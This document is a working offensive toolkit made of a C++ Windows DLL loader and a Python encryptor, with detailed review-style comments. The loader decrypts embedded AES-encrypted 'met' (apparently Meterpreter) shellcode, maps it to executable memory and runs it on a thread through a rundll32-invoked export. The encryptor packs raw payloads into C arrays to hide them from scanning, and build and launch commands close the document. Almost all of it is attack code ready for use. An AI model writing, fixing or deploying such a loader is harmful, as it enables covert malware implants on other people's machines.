gotem.cpp (the build command further down compiles it as bind.cpp — use one file name consistently)
#include <windows.h>
#include <stdio.h>
#include <wincrypt.h>
#pragma comment (lib, "crypt32.lib")
#pragma comment (lib, "user32.lib")
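/*
 * Decrypt `shellcode` in place with AES-256-CBC via CryptoAPI.
 *
 * Key derivation: CryptDeriveKey(CALG_AES_256) over SHA-256(key). As documented
 * for CryptDeriveKey, a SHA-2 digest that is at least as long as the requested
 * key is used directly, which matches the companion Python encryptor
 * (hashlib.sha256(KEY).digest()). The IV is left at CryptoAPI's default (all
 * zero), which is what the encryptor's `16 * b'\x00'` relies on; a fixed zero
 * IV is only tolerable because each key encrypts exactly one message.
 *
 * Final is FALSE, so PKCS#7 padding is NOT stripped: the trailing padding
 * bytes stay in the buffer after the shellcode, and `shellcodeLen` must be a
 * multiple of the AES block size (it is, since the encryptor pads).
 *
 * Returns TRUE on success, FALSE on the first failing CryptoAPI call (the
 * error is also printed). On FALSE the buffer still holds ciphertext — callers
 * must not execute it. The original returned void; existing callers that
 * ignore the result still compile. All handles are released on every path
 * (the original leaked the provider/hash handles on the error returns).
 */
BOOL DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {
    HCRYPTPROV hProv = 0;
    HCRYPTHASH hHash = 0;
    HCRYPTKEY hKey = 0;
    BOOL ok = FALSE;

    // CRYPT_VERIFYCONTEXT: ephemeral context, no persistent key container touched.
    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        printf("Failed in CryptAcquireContextW (%lu)\n", GetLastError());
        goto cleanup;
    }
    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
        printf("Failed in CryptCreateHash (%lu)\n", GetLastError());
        goto cleanup;
    }
    if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {
        printf("Failed in CryptHashData (%lu)\n", GetLastError());
        goto cleanup;
    }
    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
        printf("Failed in CryptDeriveKey (%lu)\n", GetLastError());
        goto cleanup;
    }
    // In-place decrypt. With Final=FALSE the length written back to
    // shellcodeLen is unchanged, so not returning it loses nothing.
    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, FALSE, 0, (BYTE*)shellcode, &shellcodeLen)) {
        printf("Failed in CryptDecrypt (%lu)\n", GetLastError());
        goto cleanup;
    }
    ok = TRUE;

cleanup:
    // Release in reverse order of acquisition; a handle that was never
    // obtained is still 0 and is skipped.
    if (hKey) CryptDestroyKey(hKey);
    if (hHash) CryptDestroyHash(hHash);
    if (hProv) CryptReleaseContext(hProv, 0);
    return ok;
}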
// DLL entry point. Nothing happens on process/thread attach or detach; the
// payload only runs when the exported HelloWorld is invoked explicitly
// (e.g. through rundll32). Always reports successful load.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    (void)hModule;
    (void)lpReserved;
    (void)ul_reason_for_call;  // every reason code is the same no-op
    return TRUE;
}
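extern "C" {
/*
 * Exported entry point (run e.g. as `rundll32.exe bind.dll,HelloWorld`).
 *
 * Decrypts the embedded AES payload in place, copies it into a fresh RW
 * allocation, flips that allocation to RX, runs it on a new thread and waits
 * for the thread to finish.
 *
 * Returns 0 on success or a negative code on the first failed Win32 call
 * (-1 VirtualAlloc, -2 VirtualProtect, -3 CreateThread). The BOOL return type
 * and these values are kept from the original export for compatibility, even
 * though 0 reads as FALSE.
 *
 * Fixes versus the original: the payload was started twice (once on the
 * thread, then again by a direct call after a getchar() that blocks on a
 * console rundll32 does not have); the thread handle was never closed; the
 * allocation leaked on the VirtualProtect/CreateThread error paths; the
 * unreachable `return TRUE` after `return 0` is gone; and AESkey is passed
 * with an explicit cast (unsigned char* -> char* is an error in C++ without
 * -fpermissive).
 */
__declspec(dllexport) BOOL WINAPI HelloWorld(void) {
    unsigned char AESkey[] = { ...rando key from aes_encryptor tool... };
    unsigned char payload[] = { ...encrypted met shellcode output from the aes_encryptor tool... };
    DWORD payload_length = sizeof(payload);

    // Allocate RW first and only flip to RX after the copy, so the region is
    // never writable and executable at the same time.
    LPVOID alloc_mem = VirtualAlloc(NULL, payload_length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!alloc_mem) {
        printf("Failed to Allocate memory (%lu)\n", GetLastError());
        return -1;
    }

    // In-place decrypt. NOTE(review): DecryptAES reports failures only via
    // printf; if it fails, `payload` still holds ciphertext and the code
    // below would execute that. Nothing here can detect it.
    DecryptAES((char*)payload, payload_length, (char*)AESkey, sizeof(AESkey));
    MoveMemory(alloc_mem, payload, payload_length);

    // The stack copies of the key and plaintext are no longer needed;
    // SecureZeroMemory is not optimised away like a plain memset would be.
    SecureZeroMemory(payload, sizeof(payload));
    SecureZeroMemory(AESkey, sizeof(AESkey));

    DWORD oldProtect = 0;
    if (!VirtualProtect(alloc_mem, payload_length, PAGE_EXECUTE_READ, &oldProtect)) {
        printf("Failed to change memory protection (%lu)\n", GetLastError());
        VirtualFree(alloc_mem, 0, MEM_RELEASE);
        return -2;
    }

    HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
    if (!tHandle) {
        printf("Failed to Create the thread (%lu)\n", GetLastError());
        VirtualFree(alloc_mem, 0, MEM_RELEASE);
        return -3;
    }

    printf("\n\nalloc_mem : %p\n", alloc_mem);
    WaitForSingleObject(tHandle, INFINITE);
    CloseHandle(tHandle);
    // alloc_mem is intentionally not freed here, as in the original: the
    // payload may have left code running in that region.
    return 0;
}
}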
- `pip install pycryptodome`

aes_crypt.py (the loader's comments call this the "aes_encryptor tool" and its own usage string says AES_cryptor.py — it is the same script):
import sys
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from os import urandom
import hashlib
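def AESencrypt(plaintext, key):
    """Encrypt ``plaintext`` with AES-256-CBC under SHA-256(``key``).

    Mirrors what the loader's DecryptAES expects: the AES key is the raw
    SHA-256 digest of ``key`` (CryptDeriveKey over a SHA-256 hash) and the IV
    is all zeros (CryptoAPI's default). A fixed zero IV is only acceptable
    because ``key`` is fresh random bytes used for exactly one payload.
    PKCS#7 padding is applied; the loader decrypts with Final=FALSE and simply
    leaves the padding bytes after the shellcode.

    Args:
        plaintext: raw payload bytes.
        key: bytes to hash into the AES key.

    Returns:
        ``(ciphertext, key)`` — the key is echoed back unchanged.
    """
    # Derive from the parameter. The original hashed the module-level KEY,
    # which only worked because the caller happened to pass the same object.
    aes_key = hashlib.sha256(key).digest()
    iv = bytes(AES.block_size)  # 16 zero bytes, matching the loader's default IV
    padded = pad(plaintext, AES.block_size)
    ciphertext = AES.new(aes_key, AES.MODE_CBC, iv).encrypt(padded)
    return ciphertext, key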
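def printResult(key, ciphertext):
    """Print ``key`` and ``ciphertext`` as C array initialisers.

    Uses the ``key`` argument (the original read the module-level KEY instead).
    Output format is unchanged: ``0x`` followed by the unpadded hex of each
    byte, comma separated. Note the loader on this page declares these as
    ``unsigned char AESkey[]`` and ``unsigned char payload[]``, so rename on
    paste.
    """
    def c_array(data):
        return ', '.join('0x' + format(b, 'x') for b in data)

    print('char AESkey[] = { ' + c_array(key) + ' };')
    print('unsigned char AESshellcode[] = { ' + c_array(ciphertext) + ' };')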
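# --- script entry: aes_crypt.py PAYLOAD_FILE ---------------------------------
# Read the raw payload, encrypt it under a fresh random key and print both as
# C array initialisers for the loader.
try:
    with open(sys.argv[1], "rb") as payload_file:  # closed on every path
        content = payload_file.read()
except (IndexError, OSError):
    # Missing argument or unreadable file. The original used a bare `except`
    # (which also swallowed KeyboardInterrupt) and exited with status 0; a
    # usage error now exits non-zero. The escaped backslash prints the same
    # text but avoids the invalid-escape warning for "\A".
    print("Usage: .\\AES_cryptor.py PAYLOAD_FILE")
    sys.exit(1)

# 16 random bytes; AESencrypt stretches them to a 32-byte AES-256 key with
# SHA-256, so the key has 128 bits of entropy. It is embedded in the loader
# next to the ciphertext, so this is obfuscation, not confidentiality.
KEY = urandom(16)
ciphertext, key = AESencrypt(content, KEY)
printResult(key, ciphertext)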
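# Cross-compile the DLL. The page's source is named gotem.cpp; the input name
# here must match. -fpermissive is only needed because HelloWorld passes the
# `unsigned char AESkey[]` array to DecryptAES's `char*` parameter without a
# cast, which is an error in C++; add the cast and the flag can be dropped.
x86_64-w64-mingw32-g++ -shared -o bind.dll bind.cpp -fpermissive
...
# Invoke the exported entry point; the payload runs inside rundll32.exe.
rundll32.exe bind.dll, HelloWorld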